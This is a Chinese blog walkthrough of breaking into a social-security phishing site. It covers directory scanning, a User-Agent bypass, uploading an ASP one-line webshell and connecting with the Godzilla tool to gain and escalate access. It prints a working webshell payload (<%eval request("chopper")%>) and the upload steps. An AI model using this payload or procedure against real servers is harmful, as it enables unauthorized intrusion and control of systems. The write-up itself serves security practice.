实战 | 记某社保钓鱼诈骗的网站渗透
2023-11-15 00:2:1 Author: 橘猫学安全(查看原文) 阅读量:20 收藏

我们利用scandir 对钓鱼网站进行扫描

发现一个文件上传的入口,我们可以利用他进行上传webshell

二、哥斯拉webshell

绕UA信息

访问这个网站,发现这个小可爱骗骗还搞个个电脑访问

利用谷歌自带的工具 修改UA信息

可以看到这个是非常一个经典的钓鱼网站,一般人们通过填写个人信息,银行卡钱就无了。

三、文件上传webshell

编写一句话asp

一句话asp地址

https://blog.csdn.net/qq_53065516/article/details/115264944?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522167050699716782412517259%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=167050699716782412517259&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-115264944-null-null.142%5Ev68%5Epc_new_rank,201%5Ev4%5Eadd_ask,213%5Ev2%5Et3_esquery_v2&utm_term=aspx%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC&spm=1018.2226.3001.4187

访问我们刚刚发现的 sn.asp ,显而易见这个是一个java写的,我尝试写一个asp马

<%eval request("chopper")%>文件上传

文件上传

重命名文件为 asp 后缀文件,然后,上传。

之后访问IP/xx.asp文件

哥斯拉

利用我们的哥斯拉进行连接

哥斯拉那边运行一下

之后就可以像我这样上线提权了

原创作者:keyoldk原文链接:https://www.freebuf.com/articles/web/352797.html如有侵权,请联系删除
如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247510531&idx=1&sn=c927964ca08e7bf687f9987810cb49ab&chksm=c04d2d3df73aa42b714adbf326e4f49984fa0d98302291b142565056cf3197aba288dca6f061&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh